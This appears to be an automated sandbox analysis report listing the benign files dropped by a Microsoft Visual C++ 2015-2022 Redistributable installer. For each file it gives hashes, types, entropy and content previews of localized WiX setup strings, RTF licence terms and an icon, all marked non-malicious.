                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):3095
                                                                                                                                                                                                                                Entropy (8bit):5.150868216959352
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:
                                                                                                                                                                                                                                MD5:BE27B98E086D2B8068B16DBF43E18D50
                                                                                                                                                                                                                                SHA1:6FAF34A36C8D9DE55650D0466563852552927603
                                                                                                                                                                                                                                SHA-256:F52B54A0E0D0E8F12CBA9823D88E9FD6822B669074DD1DC69DAD6553F7CB8913
                                                                                                                                                                                                                                SHA-512:3B7C773EF72D40A8B123FDB8FC11C4F354A3B152CF6D247F02E494B0770C28483392C76F3C222E3719CF500FE98F535014192ACDDD2ED9EF971718EA3EC0A73E
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Preview:<?xml version="1.0" encoding="utf-8"?>.. .. Copyright (c) Microsoft Corporation. All rights reserved...-->..<WixLocalization Culture="en-us" xmlns="http://schemas.microsoft.com/wix/2006/localization">.. <Control Control="EulaAcceptCheckbox" X="11" Y="-41" Width="-11" Height="29"/>.... <String Id="Caption">[WixBundleName] Instala..o</String>.. <String Id="Title">[WixBundleName]</String>.. <String Id="ConfirmCancelMessage">Tem certeza de que deseja cancelar?</String>.. <String Id="HelpHeader">Ajuda da Instala..o</String>.. <String Id="HelpText">/install | /repair | /uninstall | /layout [diret.rio - instala, repara, desinstala ou.. cria uma c.pia local completa do pacote no diret.rio. Install . o padr.o..../passive | /quiet - exibe a IU m.nima sem nenhum prompt ou n.o exibe nenhuma IU e.. nenhum prompt. Por padr.o, a IU e todos os prompts s.o exibidos...../norestart - suprime qualquer tentativa de reiniciar. Por padr.o, a IU perguntar. antes de reiniciar
                                                                                                                                                                                                                                Process:C:\Windows\Temp\{AC1CDB68-D92A-427E-A09B-9742E51C62BE}\.cr\vc_redist.x64.exe
                                                                                                                                                                                                                                File Type:Rich Text Format data, version 1, ANSI
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):31981
                                                                                                                                                                                                                                Entropy (8bit):3.6408688850128446
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:
                                                                                                                                                                                                                                MD5:62229BE4447C349DF353C5D56372D64B
                                                                                                                                                                                                                                SHA1:989799ED24913A0E6AE2546EE2A9A8D556E1CB3B
                                                                                                                                                                                                                                SHA-256:1BB3FB55B8A13FA3BAFFFE72F5B1ED8B57A63BD4D8654BB6DC5B9011CE803B44
                                                                                                                                                                                                                                SHA-512:FA366328C3FD4F683FDB1C5A64F5D554DE79620331086E8B4CCC2BFC2595B1FDED02CEC8AA982FCD8B13CC175D222AF2D7E2CD1A33B52F36AFD692B533FDBF13
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Preview:{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset204 Tahoma;}{\f1\fnil Tahoma;}{\f2\fnil\fcharset0 Tahoma;}{\f3\fnil\fcharset204 Garamond;}{\f4\fnil\fcharset2 Symbol;}}..{\colortbl ;\red0\green32\blue96;\red0\green0\blue255;}..{\*\generator Riched20 10.0.19041}\viewkind4\uc1 ..\pard\sb120\sa120\sl240\slmult1\b\f0\fs20\lang1049\'d3\'d1\'cb\'ce\'c2\'c8\'df \'cb\'c8\'d6\'c5\'cd\'c7\'c8\'c8 \'cd\'c0 \'cf\'d0\'ce\'c3\'d0\'c0\'cc\'cc\'cd\'ce\'c5 \'ce\'c1\'c5\'d1\'cf\'c5\'d7\'c5\'cd\'c8\'c5 MICROSOFT\par..\'d1\'d0\'c5\'c4\'c0 \'c2\'db\'cf\'ce\'cb\'cd\'c5\'cd\'c8\'df MICROSOFT VISUAL C++ 2015\f1\endash\f2 2022 \par..\b0\f0\'cd\'e0\'f1\'f2\'ee\'ff\'f9\'e8\'e5 \'f3\'f1\'eb\'ee\'e2\'e8\'ff \'eb\'e8\'f6\'e5\'ed\'e7\'e8\'e8 \'ff\'e2\'eb\'ff\'fe\'f2\'f1\'ff \'f1\'ee\'e3\'eb\'e0\'f8\'e5\'ed\'e8\'e5\'ec \'ec\'e5\'e6\'e4\'f3 \'ea\'ee\'f0\'ef\'ee\'f0\'e0\'f6\'e8\'e5\'e9 Microsoft (\'e8\'eb\'e8, \'e2 \'e7\'e0\'e2\'e8\'f1\'e8\'ec\'ee\'f1\'f2\'e8 \'ee\'f2 \'ec\'e5\'f1\'f2\'e0
                                                                                                                                                                                                                                Process:C:\Windows\Temp\{AC1CDB68-D92A-427E-A09B-9742E51C62BE}\.cr\vc_redist.x64.exe
                                                                                                                                                                                                                                File Type:XML 1.0 document, UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):4150
                                                                                                                                                                                                                                Entropy (8bit):5.444436038992627
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:
                                                                                                                                                                                                                                MD5:17C652452E5EE930A7F1E5E312C17324
                                                                                                                                                                                                                                SHA1:59F3308B87143D8EA0EA319A1F1A1F5DA5759DD3
                                                                                                                                                                                                                                SHA-256:7333BC8E52548821D82B53DBD7D7C4AA1703C85155480CB83CEFD78380C95661
                                                                                                                                                                                                                                SHA-512:53FD207B96D6BCF0A442E2D90B92E26CBB3ECC6ED71B753A416730E8067E831E9EB32981A9E9368C4CCA16AFBCB2051483FDCFC474EA8F0D652FCA934634FBE8
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Preview:<?xml version="1.0" encoding="utf-8"?>.. .. Copyright (c) Microsoft Corporation. All rights reserved...-->..<WixLocalization Culture="en-us" xmlns="http://schemas.microsoft.com/wix/2006/localization">.. <Control Control="EulaAcceptCheckbox" X="11" Y="-41" Width="-11" Height="29"/>.. <Control Control="InstallButton" X="275" Y="237" Width="110" Height="23"/>.... <String Id="Caption">......... ......... [WixBundleName]</String>.. <String Id="Title">[WixBundleName]</String>.. <String Id="ConfirmCancelMessage">........?</String>.. <String Id="HelpHeader">....... .. .........</String>.. <String Id="HelpText">/install | /repair | /uninstall | /layout [.......] - ........., .............., ........ ..... ........ ...... ......... ..... ...... . ......... .. ......... - ............../passive | /quiet - ........... ....
                                                                                                                                                                                                                                Process:C:\Windows\Temp\{AC1CDB68-D92A-427E-A09B-9742E51C62BE}\.cr\vc_redist.x64.exe
                                                                                                                                                                                                                                File Type:Rich Text Format data, version 1, ANSI
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):13807
                                                                                                                                                                                                                                Entropy (8bit):5.2077828423114045
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:
                                                                                                                                                                                                                                MD5:9625F3A496DBF5E3E0D2F33D417EDBBF
                                                                                                                                                                                                                                SHA1:119376730428812A31B70D58C873866D5307A775
                                                                                                                                                                                                                                SHA-256:F80926604E503697247353F56856B31DE0B3FC1319F1C94068363952549CC9B1
                                                                                                                                                                                                                                SHA-512:DB91A14FC27E3A62324E024DD44E3B5548AF7E1C021201C3D851BD2F32537885AACFC64ADAE619BAC31B60229D1D5FC653F5301CD7187C69BD0ACECCE817D6A3
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Preview:{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Tahoma;}{\f1\fnil\fcharset238 Tahoma;}{\f2\fnil\fcharset238 Garamond;}{\f3\fnil\fcharset2 Symbol;}}..{\colortbl ;\red0\green32\blue96;\red0\green0\blue255;}..{\*\generator Riched20 10.0.19041}\viewkind4\uc1 ..\pard\sb120\sa120\sl240\slmult1\b\f0\fs20\lang9 MICROSOFT YAZILIMI L\f1\u304?SANS KO\'aaULLARI\par..\f0 MICROSOFT VISUAL C++ 2015 - 2022 \'c7ALI\f1\'aaMA S\f0\'dcRESI \par..\b0 Bu lisans ko\f1\'baullar\u305?, Microsoft Corporation (veya ya\'baad\u305?\u287?\u305?n\u305?z yere g\f0\'f6re bir ba\f1\u287?l\u305? \'bairketi) ile sizin aran\u305?zda yap\u305?lan s\f0\'f6zle\f1\'bameyi olu\'baturur. Bu ko\'baullar, yukar\u305?da ad\u305? ge\f0\'e7en yaz\f1\u305?l\u305?m i\f0\'e7in ge\'e7erlidir. \f1\'aaartlar, yaz\u305?l\u305?m i\f0\'e7in t\'fcm Microsoft hizmetleri veya g\'fcncelle\f1\'batirmeleri i\f0\'e7in, beraberlerinde farkl\f1\u305? \'baartlar bulunmad\u305?\u287?\u305? s\f0\'fcrece ge\'e7erlidir.\pa
                                                                                                                                                                                                                                Process:C:\Windows\Temp\{AC1CDB68-D92A-427E-A09B-9742E51C62BE}\.cr\vc_redist.x64.exe
                                                                                                                                                                                                                                File Type:XML 1.0 document, UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):3221
                                                                                                                                                                                                                                Entropy (8bit):5.280530692056262
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:
                                                                                                                                                                                                                                MD5:DEFBEA001DC4EB66553630AC7CE47CCA
                                                                                                                                                                                                                                SHA1:90CED64EC7C861F03484B5D5616FDBCDA8F64788
                                                                                                                                                                                                                                SHA-256:E5ABE3CB3BF84207DAC4E6F5BBA1E693341D01AEA076DD2D91EAA21C6A6CB925
                                                                                                                                                                                                                                SHA-512:B3B7A22D0CDADA21A977F1DCEAF2D73212A4CDDBD298532B1AC97575F36113D45E8D71C60A6D8F8CC2E9DBF18EE1000167CFBF0B2E7ED6F05462D77E0BCA0E90
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Preview:<?xml version="1.0" encoding="utf-8"?>.. .. Copyright (c) Microsoft Corporation. All rights reserved...-->..<WixLocalization Culture="en-us" xmlns="http://schemas.microsoft.com/wix/2006/localization">.. <Control Control="EulaAcceptCheckbox" X="11" Y="-41" Width="-11" Height="29"/>.... <String Id="Caption">[WixBundleName] Kurulumu</String>.. <String Id="Title">[WixBundleName]</String>.. <String Id="ConfirmCancelMessage">.ptal etmek istedi.inizden emin misiniz?</String>.. <String Id="HelpHeader">Kurulum Yard.m.</String>.. <String Id="HelpText">/install | /repair | /uninstall | /layout [dizin] - y.kler, onar.r, kald.r.r ya da.. dizindeki paketin tam bir yerel kopyas.n. olu.turur. Varsay.lan install de.eridir...../passive | /quiet - en az d.zeyde istemsiz UI g.sterir ya da hi. UI g.stermez ve.. istem yoktur. Varsay.lan olarak UI ve t.m istemler g.r.nt.lenir...../norestart - yeniden ba.lama denemelerini engeller. Varsay.lan olarak UI yeniden ba.l
                                                                                                                                                                                                                                Process:C:\Windows\Temp\{AC1CDB68-D92A-427E-A09B-9742E51C62BE}\.cr\vc_redist.x64.exe
                                                                                                                                                                                                                                File Type:Rich Text Format data, version 1, ANSI
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):18214
                                                                                                                                                                                                                                Entropy (8bit):3.9837154113926356
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:
                                                                                                                                                                                                                                MD5:D083C7E300928A0C5AEA5ECBD1653836
                                                                                                                                                                                                                                SHA1:08F4F1F9F7DFA593BE3977515635967CE7A99E7A
                                                                                                                                                                                                                                SHA-256:A808B4933CE3B3E0893504DBEF43EBF90B8B567F94BD6481B6315ED9141E1B11
                                                                                                                                                                                                                                SHA-512:8CB3FFAD879BABA36137B7A21B62D9D6C530693F5E16FBB975F3E7C20F1DB5A686F3A6EE406D69B018AA494E4CD185F71B369A378AE3289B8080105157E63FD0
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Preview:{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Tahoma;}{\f1\fnil\fcharset134 SimSun;}{\f2\fnil\fcharset2 Symbol;}}..{\colortbl ;\red0\green32\blue96;\red0\green0\blue255;}..{\*\generator Riched20 10.0.19041}\viewkind4\uc1 ..\pard\sb120\sa120\sl240\slmult1\b\f0\fs20\lang9 Microsoft \f1\'c8\'ed\'bc\'fe\'d0\'ed\'bf\'c9\'cc\'f5\'bf\'ee\f0\par..MICROSOFT VISUAL C++ 2015 - 2022 RUNTIME \par..\b0\f1\'d5\'e2\'d0\'a9\'d0\'ed\'bf\'c9\'cc\'f5\'bf\'ee\'ca\'c7\f0 Microsoft Corporation\f1\'a3\'a8\'bb\'f2\'c4\'fa\'cb\'f9\'d4\'da\'b5\'d8\'b5\'c4\f0 Microsoft \f1\'b9\'d8\'c1\'aa\'b9\'ab\'cb\'be\'a3\'a9\'d3\'eb\'c4\'fa\'d6\'ae\'bc\'e4\'b4\'ef\'b3\'c9\'b5\'c4\'d0\'ad\'d2\'e9\'a1\'a3\'d5\'e2\'d0\'a9\'cc\'f5\'bf\'ee\'ca\'ca\'d3\'c3\'d3\'da\'c9\'cf\'ca\'f6\'c8\'ed\'bc\'fe\'a1\'a3\'d5\'e2\'d0\'a9\'cc\'f5\'bf\'ee\'d2\'b2\'ca\'ca\'d3\'c3\'d3\'da\'d5\'eb\'b6\'d4\'b8\'c3\'c8\'ed\'bc\'fe\'b5\'c4\'c8\'ce\'ba\'ce\f0 Microsoft \f1\'b7\'fe\'ce\'f1\'bb\'f2\'b8\'fc\'d0\'c2\'a3\'ac\'
                                                                                                                                                                                                                                Process:C:\Windows\Temp\{AC1CDB68-D92A-427E-A09B-9742E51C62BE}\.cr\vc_redist.x64.exe
                                                                                                                                                                                                                                File Type:XML 1.0 document, UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):2978
                                                                                                                                                                                                                                Entropy (8bit):6.135205733555905
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:
                                                                                                                                                                                                                                MD5:3D1E15DEEACE801322E222969A574F17
                                                                                                                                                                                                                                SHA1:58074C83775E1A884FED6679ACF9AC78ABB8A169
                                                                                                                                                                                                                                SHA-256:2AC8B7C19A5189662DE36A0581C90DBAD96DF259EC00A28F609B644C3F39F9CA
                                                                                                                                                                                                                                SHA-512:10797919845C57C5831234E866D730EBD13255E5BF8BA8087D53F1D0FC5D72DC6D5F6945DBEBEE69ACC6A2E20378750C4B78083AE0390632743C184532358E10
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Preview:<?xml version="1.0" encoding="utf-8"?>.. .. Copyright (c) Microsoft Corporation. All rights reserved...-->..<WixLocalization Culture="en-us" xmlns="http://schemas.microsoft.com/wix/2006/localization">.. <Control Control="EulaAcceptCheckbox" X="11" Y="-41" Width="-11" Height="29"/>.... <String Id="Caption">[WixBundleName] ....</String>.. <String Id="Title">[WixBundleName]</String>.. <String Id="ConfirmCancelMessage">.......?</String>.. <String Id="HelpHeader">......</String>.. <String Id="HelpText">/install | /repair | /uninstall | /layout [..] - .......... ..................Install ........../passive | /quiet - ..... UI ......... UI ... ........ UI ........../norestart - ..................... UI.../log log.txt - ............. %TEMP% ...
                                                                                                                                                                                                                                Process:C:\Windows\Temp\{AC1CDB68-D92A-427E-A09B-9742E51C62BE}\.cr\vc_redist.x64.exe
                                                                                                                                                                                                                                File Type:Rich Text Format data, version 1, ANSI
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):10825
                                                                                                                                                                                                                                Entropy (8bit):5.1113252296046126
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:
                                                                                                                                                                                                                                MD5:873A413D23F830D3E87DAB3B94153E08
                                                                                                                                                                                                                                SHA1:24CFC24F22CEF89818718A86F55F27606EB42668
                                                                                                                                                                                                                                SHA-256:ABC11BB2B04DFF6AFE2D4D4F40D95A7D62E5AF352928AF90DAA3DADE58DD59BD
                                                                                                                                                                                                                                SHA-512:DC1ECCB5CC4D3047401E2BC31F5EB3E21C7881C02744A2E63C10D3C911D1158DCFAC023988E873C33DC381C989304FE1D3CB27ED99D7801285C4C378553CD821
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Preview:{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Tahoma;}{\f1\fnil\fcharset0 Garamond;}{\f2\fnil\fcharset2 Symbol;}}..{\colortbl ;\red0\green32\blue96;\red0\green0\blue255;}..{\*\generator Riched20 10.0.19041}\viewkind4\uc1 ..\pard\sb120\sa120\sl240\slmult1\b\f0\fs20\lang9 T\'c9RMINOS DE LICENCIA DEL SOFTWARE DE MICROSOFT\par..MICROSOFT VISUAL C++ 2015 - 2022 RUNTIME \par..\b0 Los t\'e9rminos de esta licencia son un contrato entre Microsoft Corporation (o, en funci\'f3n de donde viva, una de las sociedades del grupo) y usted. Se aplican al software mencionado anteriormente. Los t\'e9rminos tambi\'e9n se aplican a los servicios o actualizaciones de software de Microsoft, excepto en la medida en que sus t\'e9rminos sean diferentes.\par..\b SI USTED CUMPLE LOS PRESENTES T\'c9RMINOS DE ESTA LICENCIA, DISPONDR\'c1 DE LOS DERECHOS QUE A CONTINUACI\'d3N SE DESCRIBEN.\par....\pard{\pntext\f2\'B7\tab}{\*\pn\pnlvlblt\pnf2\pnindent360{\pntxtb\'B7}}\fi-357\li357\sb1
                                                                                                                                                                                                                                Process:C:\Windows\Temp\{AC1CDB68-D92A-427E-A09B-9742E51C62BE}\.cr\vc_redist.x64.exe
                                                                                                                                                                                                                                File Type:XML 1.0 document, UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):3265
                                                                                                                                                                                                                                Entropy (8bit):5.0491645049584655
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:
                                                                                                                                                                                                                                MD5:47F9F8D342C9C22D0C9636BC7362FA8F
                                                                                                                                                                                                                                SHA1:3922D1589E284CE76AB39800E2B064F71123C1C5
                                                                                                                                                                                                                                SHA-256:9CBB2B312C100B309A1B1495E84E2228B937612885F7A642FBBD67969B632C3A
                                                                                                                                                                                                                                SHA-512:E458DF875E9B0622AEBE3C1449868AA6A2826A1F851DB71165A872B2897CF870CCF85046944FF51FFC13BB15E54E9D9424EC36CAF5A2F38CE8B7D6DC0E9B2363
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Preview:<?xml version="1.0" encoding="utf-8"?>.. .. Copyright (c) Microsoft Corporation. All rights reserved...-->..<WixLocalization Culture="en-us" xmlns="http://schemas.microsoft.com/wix/2006/localization">.. <Control Control="EulaAcceptCheckbox" X="11" Y="-41" Width="-11" Height="29"/>.... <String Id="Caption">Instalaci.n de [WixBundleName]</String>.. <String Id="Title">[WixBundleName]</String>.. <String Id="ConfirmCancelMessage">.Est. seguro de que desea cancelar la operaci.n?</String>.. <String Id="HelpHeader">Ayuda de configuraci.n</String>.. <String Id="HelpText">/install | /repair | /uninstall | /layout [directory] - instala, repara, desinstala o.. crea una copia local completa del paquete en el directorio. La opci.n predeterminada es la instalaci.n...../passive | /quiet - muestra una IU m.nima sin solicitudes o no muestra ninguna IU ni.. solicitud. De forma predeterminada, se muestran la IU y todas las solicitudes...../norestart - elimina cualquier intento
                                                                                                                                                                                                                                Process:C:\Windows\Temp\{AC1CDB68-D92A-427E-A09B-9742E51C62BE}\.cr\vc_redist.x64.exe
                                                                                                                                                                                                                                File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):15190
                                                                                                                                                                                                                                Entropy (8bit):3.741161916328991
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:
                                                                                                                                                                                                                                MD5:BBB6C504387F63354CAD2AACFAEB2A1F
                                                                                                                                                                                                                                SHA1:A54F4006EFD7C77CF61100605474C3AE6AE11F65
                                                                                                                                                                                                                                SHA-256:0C2054FF0BE00129676F278AC0E95D75EB764CE86D975FF937DE40DD7B796432
                                                                                                                                                                                                                                SHA-512:A2A67BD978F6D99CA94403ED4BBA68FFB30A6391A7B5970F9D34A06CA85AF309DA41F9F60D4EB66E46B7F1921C743823089FA97BC3CC75C92C43223C53545C46
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".u.t.f.-.1.6.".?.>.....<.B.o.o.t.s.t.r.a.p.p.e.r.A.p.p.l.i.c.a.t.i.o.n.D.a.t.a. .x.m.l.n.s.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.x./.2.0.1.0./.B.o.o.t.s.t.r.a.p.p.e.r.A.p.p.l.i.c.a.t.i.o.n.D.a.t.a.".>..... . .<.W.i.x.B.a.l.C.o.n.d.i.t.i.o.n. .C.o.n.d.i.t.i.o.n.=.".V.e.r.s.i.o.n.N.T. .&.g.t.;.=. .v.6...1.". .M.e.s.s.a.g.e.=.".[.W.i.x.B.u.n.d.l.e.N.a.m.e.]. .c.a.n. .o.n.l.y. .b.e. .i.n.s.t.a.l.l.e.d. .o.n. .W.i.n.d.o.w.s. .7. .a.n.d. .n.e.w.e.r. .p.l.a.t.f.o.r.m.s...". ./.>..... . .<.W.i.x.B.u.n.d.l.e.P.r.o.p.e.r.t.i.e.s. .D.i.s.p.l.a.y.N.a.m.e.=.".M.i.c.r.o.s.o.f.t. .V.i.s.u.a.l. .C.+.+. .2.0.1.5.-.2.0.2.2. .R.e.d.i.s.t.r.i.b.u.t.a.b.l.e. .(.x.6.4.). .-. .1.4...3.2...3.1.3.3.2.". .L.o.g.P.a.t.h.V.a.r.i.a.b.l.e.=.".W.i.x.B.u.n.d.l.e.L.o.g.". .C.o.m.p.r.e.s.s.e.d.=.".y.e.s.". .I.d.=.".{.3.7.4.6.f.2.1.b.-.c.9.9.0.-.4.0.4.5.-.b.b.3.3.-.1.c.f.9.8.c.f.f.7.a.6.8.}.". .U.p.g.r.a.d.e.C.o.d.e.=.".{.C.1.4.6.E.
                                                                                                                                                                                                                                Process:C:\Windows\Temp\{AC1CDB68-D92A-427E-A09B-9742E51C62BE}\.cr\vc_redist.x64.exe
                                                                                                                                                                                                                                File Type:Rich Text Format data, version 1, ANSI
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):9235
                                                                                                                                                                                                                                Entropy (8bit):5.167332119309966
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:
                                                                                                                                                                                                                                MD5:04B33F0A9081C10E85D0E495A1294F83
                                                                                                                                                                                                                                SHA1:1EFE2FB2D014A731B752672745F9FFECDD716412
                                                                                                                                                                                                                                SHA-256:8099DC3CF9502C335DA829E5C755948A12E3E6DE490EB492A99DEB673D883D8B
                                                                                                                                                                                                                                SHA-512:D1DBED00DF921169DD61501E2A3E95E6D7807348B188BE9DD8FC63423501E4D848ECE19AC466C3CACFCCC6084E0EB2F457DC957990F6F511DF10FD426E432685
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Preview:{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Tahoma;}{\f1\fnil\fcharset0 Garamond;}{\f2\fnil\fcharset2 Symbol;}}..{\colortbl ;\red0\green32\blue96;\red0\green0\blue255;}..{\*\generator Riched20 10.0.19041}\viewkind4\uc1 ..\pard\sb120\sa120\sl240\slmult1\b\f0\fs20\lang9 MICROSOFT SOFTWARE LICENSE TERMS\par..MICROSOFT VISUAL C++ 2015 - 2022 RUNTIME \par..\b0 These license terms are an agreement between Microsoft Corporation (or based on where you live, one of its affiliates) and you. They apply to the software named above. The terms also apply to any Microsoft services or updates for the software, except to the extent those have different terms.\par..\b IF YOU COMPLY WITH THESE LICENSE TERMS, YOU HAVE THE RIGHTS BELOW.\par....\pard{\pntext\f2\'B7\tab}{\*\pn\pnlvlblt\pnf2\pnindent360{\pntxtb\'B7}}\fi-357\li357\sb120\sa120\sl240\slmult1\tx360 INSTALLATION AND USE RIGHTS. \b0\par....\pard{\pntext\f2\'B7\tab}{\*\pn\pnlvlblt\pnf2\pnindent360{\pntxtb\'B7}}\f
                                                                                                                                                                                                                                Process:C:\Windows\Temp\{AC1CDB68-D92A-427E-A09B-9742E51C62BE}\.cr\vc_redist.x64.exe
                                                                                                                                                                                                                                File Type:PNG image data, 64 x 64, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):1861
                                                                                                                                                                                                                                Entropy (8bit):6.868587546770907
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:
                                                                                                                                                                                                                                MD5:D6BD210F227442B3362493D046CEA233
                                                                                                                                                                                                                                SHA1:FF286AC8370FC655AEA0EF35E9CF0BFCB6D698DE
                                                                                                                                                                                                                                SHA-256:335A256D4779EC5DCF283D007FB56FD8211BBCAF47DCD70FE60DED6A112744EF
                                                                                                                                                                                                                                SHA-512:464AAAB9E08DE610AD34B97D4076E92DC04C2CDC6669F60BFC50F0F9CE5D71C31B8943BD84CEE1A04FB9AB5BBED3442BD41D9CB21A0DD170EA97C463E1CE2B5B
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Preview:.PNG........IHDR...@...@.............sRGB.........gAMA......a.....PLTE].q^.r_.r_.s`.s`.s`.ta.ta.ub.ub.vc.vd.vd.vd.we.we.xe.xg.yg yg zh zh"zi"{j#|i${j$|n*~n*.n,.o,.p..q0.r2.s3.t5.x;.x<.y>.z?.|B.~C.}E..F..F..H..I..J..L..O..P..W..Y..^..a..c..g..i..q..r..}.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................S......pHYs..%...%....^.....tEXtSoftware.Paint.NET v3.5.100.r.....IDATXG..iW.@...EJ.$M...`AEpG..7TpWT@\.."....(..(.._;...di:9.c>q..g....T...._...-....F..+..w.
                                                                                                                                                                                                                                Process:C:\Windows\Temp\{AC1CDB68-D92A-427E-A09B-9742E51C62BE}\.cr\vc_redist.x64.exe
                                                                                                                                                                                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):2952
                                                                                                                                                                                                                                Entropy (8bit):5.052095286906672
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:
                                                                                                                                                                                                                                MD5:FBFCBC4DACC566A3C426F43CE10907B6
                                                                                                                                                                                                                                SHA1:63C45F9A771161740E100FAF710F30EED017D723
                                                                                                                                                                                                                                SHA-256:70400F181D00E1769774FF36BCD8B1AB5FBC431418067D31B876D18CC04EF4CE
                                                                                                                                                                                                                                SHA-512:063FB6685EE8D2FA57863A74D66A83C819FE848BA3072B6E7D1B4FE397A9B24A1037183BB2FDA776033C0936BE83888A6456AAE947E240521E2AB75D984EE35E
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Preview:<?xml version="1.0" encoding="utf-8"?>.. .. Copyright (c) Microsoft Corporation. All rights reserved...-->..<WixLocalization Culture="en-us" xmlns="http://schemas.microsoft.com/wix/2006/localization">.. <Control Control="EulaAcceptCheckbox" X="11" Y="-41" Width="-11" Height="29" />.... <String Id="Caption">[WixBundleName] Setup</String>.. <String Id="Title">[WixBundleName]</String>.. <String Id="ConfirmCancelMessage">Are you sure you want to cancel?</String>.. <String Id="HelpHeader">Setup Help</String>.. <String Id="HelpText">/install | /repair | /uninstall | /layout [directory] - installs, repairs, uninstalls or.. creates a complete local copy of the bundle in directory. Install is the default...../passive | /quiet - displays minimal UI with no prompts or displays no UI and.. no prompts. By default UI and all prompts are displayed...../norestart - suppress any attempts to restart. By default UI will prompt before restart.../log log.txt - logs to a specific file. B
                                                                                                                                                                                                                                Process:C:\Windows\Temp\{AC1CDB68-D92A-427E-A09B-9742E51C62BE}\.cr\vc_redist.x64.exe
                                                                                                                                                                                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):8332
                                                                                                                                                                                                                                Entropy (8bit):5.184632608060528
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:
                                                                                                                                                                                                                                MD5:F62729C6D2540015E072514226C121C7
                                                                                                                                                                                                                                SHA1:C1E189D693F41AC2EAFCC363F7890FC0FEA6979C
                                                                                                                                                                                                                                SHA-256:F13BAE0EC08C91B4A315BB2D86EE48FADE597E7A5440DCE6F751F98A3A4D6916
                                                                                                                                                                                                                                SHA-512:CBBFBFA7E013A2B85B78D71D32FDF65323534816978E7544CA6CEA5286A0F6E8E7E5FFC4C538200211F11B94373D5658732D5D8AA1D01F9CCFDBF20F154F1471
                                                                                                                                                                                                                                Malicious:false
